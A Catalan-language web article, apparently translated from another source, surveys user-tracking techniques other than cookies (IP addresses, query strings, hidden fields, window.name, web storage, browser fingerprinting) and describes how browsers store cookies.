Es pot fer un seguiment dels usuaris amb l'adreça IP de l'ordinador que truca a la pàgina. Aquesta tècnica està disponible des de la introducció de la World Wide Web, a mesura que es descarreguen les pàgines el servidor sol·licita l'adreça IP de l'ordinador amb el navegador o proxy, si no s'utilitza cap. El servidor pot fer un seguiment d'aquesta informació tant si hi ha galetes en ús com si no. No obstant això, aquestes adreces solen ser menys fiables a l'hora d'identificar un usuari que les galetes perquè els ordinadors i els servidors intermediaris poden ser compartits per diversos usuaris i el mateix ordinador pot rebre una adreça IP diferent a cada sessió de treball (com és el cas sovint de les connexions telefòniques). .

El seguiment per adreces IP pot ser fiable en algunes situacions, com ara connexions de banda ampla que mantenen la mateixa adreça IP durant molt de temps, sempre que estigui encès.

Alguns sistemes com Tor estan dissenyats per mantenir l'anonimat d'Internet i fer que el seguiment per adreça IP sigui impossible o poc pràctic.

URL

Una tècnica més precisa es basa en incrustar informació en URL. La part de la cadena de consulta de l'URL és una tècnica que s'utilitza normalment per a aquest propòsit, però també es poden utilitzar altres parts. Tant el servidor de Java com els mecanismes de sessió PHP utilitzen aquest mètode si les galetes no estan habilitades.

Aquest mètode implica que el servidor web afegeix sol·licituds de cadena als enllaços de la pàgina web que la porta quan s'envia al navegador. Quan l'usuari segueix un enllaç, el navegador torna la cadena de consulta adjunta al servidor.

Les cadenes de consulta utilitzades amb aquesta finalitat i les cookies són molt semblants, ambdues són informació escollida arbitràriament pel servidor i retornada pel navegador. Tanmateix, hi ha algunes diferències: quan es reutilitza un URL que conté una cadena de consulta, la mateixa informació s'envia al servidor. Per exemple, si les preferències d'un usuari estan codificades en una cadena de consulta d'un URL i l'usuari envia aquest URL a un altre usuari per correu electrònic, aquest usuari també podrà utilitzar aquestes preferències.

D'altra banda, quan un usuari accedeix a la mateixa pàgina dues vegades, no hi ha cap garantia que s'utilitzi la mateixa cadena de consulta les dues vegades. Per exemple, si un usuari arriba a una pàgina d'una pàgina interna del lloc la primera vegada i arriba a la mateixa pàgina des d'una pàgina externa la segona vegada, la cadena de consulta relativa a la pàgina del lloc sol ser diferent, mentre que les galetes són les mateixes. .

Altres desavantatges de les cadenes de consulta estan relacionades amb la seguretat: mantenir les dades que identifiquen una sessió en cadenes de consulta permet o simplifica els atacs de fixació de sessions, els atacs de referència d'identificadors i altres exploits. Passar identificadors de sessió com a galetes HTTP és més segur.

Camp de formulari ocult

Una forma de seguiment de sessions, utilitzada per ASP.NET, és utilitzar formularis web amb camps ocults. Aquesta tècnica és molt semblant a utilitzar cadenes de consulta d'URL per portar informació i té els mateixos avantatges i desavantatges; i si el formulari es processa amb el mètode HTTP GET, els camps en realitat passen a formar part de l'URL del navegador que l'enviarà en enviar el formulari. Però la majoria de formularis es processen amb HTTP POST, la qual cosa fa que la informació del formulari, inclosos els camps ocults, s'afegeixi com a entrada addicional que no forma part de l'URL ni d'una galeta.

Aquest enfocament té dos avantatges des de la perspectiva del seguiment: primer, el seguiment de la informació col·locada al codi font HTML i l'entrada POST en lloc de l'URL permetrà a l'usuari mitjà evitar aquest seguiment; en segon lloc, la informació de la sessió no es copia quan l'usuari copia l'URL (per desar la pàgina al disc o enviar-la per correu electrònic, per exemple).

finestra.nom

Tots els navegadors web habituals poden emmagatzemar una gran quantitat de dades (de 2 MB a 32 MB) mitjançant JavaScript mitjançant la propietat window.name del DOM. Aquestes dades es poden utilitzar en lloc de les galetes de sessió i també s'utilitzen en tots els dominis. La tècnica es pot combinar amb objectes JSON per emmagatzemar un conjunt complex de variables de sessió del costat del client.

L'inconvenient és que cada finestra o pestanya separada tindrà inicialment una finestra.nom buida; en navegar per pestanyes (obertes per l'usuari) això vol dir que les pestanyes obertes individualment no tindran un nom de finestra. A més, window.name es pot utilitzar per fer un seguiment dels visitants a diferents llocs que poden suposar un problema de privadesa.

En alguns aspectes això pot ser més segur que les galetes, a causa de la no implicació del servidor, fent-lo invulnerable a l'atac a la xarxa de les galetes sniffer. Tanmateix, si es prenen mesures especials per protegir les dades, és vulnerable a més atacs, ja que les dades estan disponibles a través d'altres llocs oberts a la mateixa finestra.

Autenticació HTTP

El protocol HTTP inclou els protocols bàsics d'autenticació d'accés i el resum d'autenticació d'accés, que permet accedir a una pàgina web només quan l'usuari ha donat el nom d'usuari i la contrasenya. Si el servidor demana un certificat per atorgar accés a una pàgina web, el navegador ho sol·licita a l'usuari i un cop obtingut, el navegador l'emmagatzema i l'envia en totes les peticions HTTP posteriors. Aquesta informació es pot utilitzar per rastrejar l'usuari.

Objecte local compartit

Si un navegador inclou el connector Adobe Flash Player, el objectes locals compartits es pot utilitzar amb la mateixa finalitat que les cookies. Poden ser una opció atractiva per als desenvolupadors web perquè:

  • el límit de mida predeterminat per a un objecte local compartit és de 100 KB;
  • les comprovacions de seguretat estan separades de les comprovacions de galetes de l'usuari (de manera que es poden permetre objectes locals compartits quan no ho són).

Aquest darrer punt, que distingeix la política de gestió de galetes de la dels objectes locals compartits d'Adobe planteja preguntes pel que fa a la gestió per part de l'usuari de la seva configuració de privadesa: ha de ser conscient que la seva gestió de cookies no té cap impacte en la gestió dels objectes locals compartits, i viceversa.

Una altra crítica a aquest sistema és que només es pot utilitzar mitjançant el connector Adobe Flash Player que és propietari i no un estàndard web.

Persistència del costat del client

Alguns navegadors web admeten un mecanisme de persistència basat en scripts, que permet que la pàgina emmagatzemi informació localment per al seu ús posterior. Internet Explorer, per exemple, admet informació persistent a l'historial del navegador, a les adreces d'interès, en un format emmagatzemat en XML o directament amb una pàgina web desada al disc. Per a Microsoft Internet Explorer 5, hi ha un mètode de dades d'usuari disponible mitjançant comportaments DHTML.

El W3C va introduir a HTML 5 una nova API de JavaScript per a l'emmagatzematge de dades del costat del client anomenada Emmagatzematge web i amb l'objectiu de substituir permanentment les galetes. És semblant a les cookies però amb una capacitat molt millorada i sense emmagatzemar informació a la capçalera de les peticions HTTP. L'API permet dos tipus d'emmagatzematge web: emmagatzematge local i emmagatzematge de sessions, similar a les galetes persistents i les galetes de sessió (excepte que les galetes de sessió caduquen quan es tanca el navegador mentre emmagatzematge de sessions caduquen quan es tanqui la pestanya), respectivament. L'emmagatzematge web és compatible amb Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 i Opera 10.50.

Un mecanisme diferent normalment es basa en l'emmagatzematge a la memòria cau del navegador (a la memòria en lloc d'actualitzar) mitjançant programes JavaScript a les pàgines web. 

Per exemple, una pàgina pot contenir l'etiqueta . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

En aquest punt, el programa roman a la memòria cau i la pàgina visitada no es torna a carregar una segona vegada. En conseqüència, si el programa conté una variable global (per exemple, var id = 3243242;), aquest identificador continua sent vàlid i pot ser explotat per un altre codi JavaScript un cop es carregui de nou la pàgina, o una vegada que es carregui una pàgina que enllaça el programa. 

El principal desavantatge d'aquest mètode és que la variable global de JavaScript ha de ser estàtica, és a dir, no es pot canviar ni esborrar com una galeta.

empremta digital del navegador web

Una empremta digital del navegador és informació recopilada sobre la configuració d'un navegador amb finalitats d'identificació. Aquestes empremtes digitals es poden utilitzar per identificar totalment o parcialment un usuari d'Internet o un dispositiu, fins i tot quan les galetes estiguin desactivades.

Els serveis d'audiència del lloc web recullen la informació bàsica de configuració del navegador web des de fa temps amb la finalitat de mesurar amb precisió el trànsit web humà i detectar diverses formes de frau de clics. Amb l'ajuda dels llenguatges de script del costat del client, la recopilació d'informació és molt més precisa ara possible.

Convertir aquesta informació en una cadena de bits produeix una empremta digital del dispositiu. El 2010, l'Electronic Frontier Foundation (EFF) va mesurar l'entropia de l'empremta digital d'un navegador com a mínim 18,1 bits de, i això va ser abans que els avenços en l'empremta digital del llenç afegeixessin 5,7 bits a aquesta entropia.

Galetes en poques paraules

Les cookies són petits fitxers de text emmagatzemats pel navegador web al disc dur d'un visitant del lloc web i que s'utilitzen (entre altres coses) per registrar informació sobre el visitant o el seu recorregut pel lloc. Així, el webmaster pot reconèixer els hàbits d'un visitant i personalitzar la presentació del seu lloc per a cada visitant; Les galetes permeten recordar quants articles mostrar a la pàgina d'inici o fins i tot conservar les credencials d'inici de sessió per a qualsevol persona privada: quan el visitant torna al lloc, ja no cal que introdueixi el seu nom i contrasenya per ser reconeguts, ja que es llegeixen automàticament a la cookie.

Una galeta té una vida útil limitada, establerta pel dissenyador del lloc. També poden caducar al final de la sessió al lloc, que correspon al tancament del navegador. Les cookies s'utilitzen àmpliament per facilitar la vida als visitants i presentar-los informació més rellevant. Però tècniques especials permeten seguir un visitant en diversos llocs i així recollir i contrastar informació molt extensa sobre els seus hàbits. Aquest mètode ha donat a l'ús de cookies una reputació com una tècnica de vigilància que vulnera la privadesa dels visitants, cosa que lamentablement es correspon amb la realitat en molts casos d'ús per motius no tècnics o no respectuosos amb les expectatives dels usuaris.

En resposta a aquests temors legítims, HTML 5 introdueix una nova API de JavaScript per a l'emmagatzematge de dades del costat del client anomenada emmagatzematge web, que és molt més segura i amb més capacitat, que pretén substituir les galetes.

Emmagatzematge de cookies

Amb alguns navegadors, una galeta és fàcilment editable, un simple editor de text com el Bloc de notes és suficient per canviar-ne els valors manualment.

Les cookies es guarden de manera diferent segons el navegador:

  • Microsoft Internet Explorer desa cada galeta en un fitxer diferent;
  • Mozilla Firefox desa totes les seves cookies en un sol fitxer;
  • Òpera guarda totes les seves cookies en un únic fitxer i les xifra (impossible modificar-les excepte en les opcions del programari);
  • apple Safari desa totes les seves galetes en un únic fitxer d'extensió .plist. La modificació és possible però no és molt fàcil, tret que passeu per les opcions del programari.

Els navegadors són necessaris per donar suport un mínim :

  • 300 galetes simultànies;
  • 4 o per galeta;
  • 20 galetes per host o domini.
[Total: 0 Significar: 0]

Escrit per Editors de ressenyes

L’equip d’editors experts passa el seu temps investigant productes, realitzant proves pràctiques, entrevistant professionals del sector, revisant comentaris dels consumidors i escrivint tots els nostres resultats com a resums comprensibles i complets.

Deixa un comentari

La seva adreça de correu electrònic no es publicarà. Els camps necessaris estan marcats *

Què et sembla?

384 Punts
Upvote Avantatge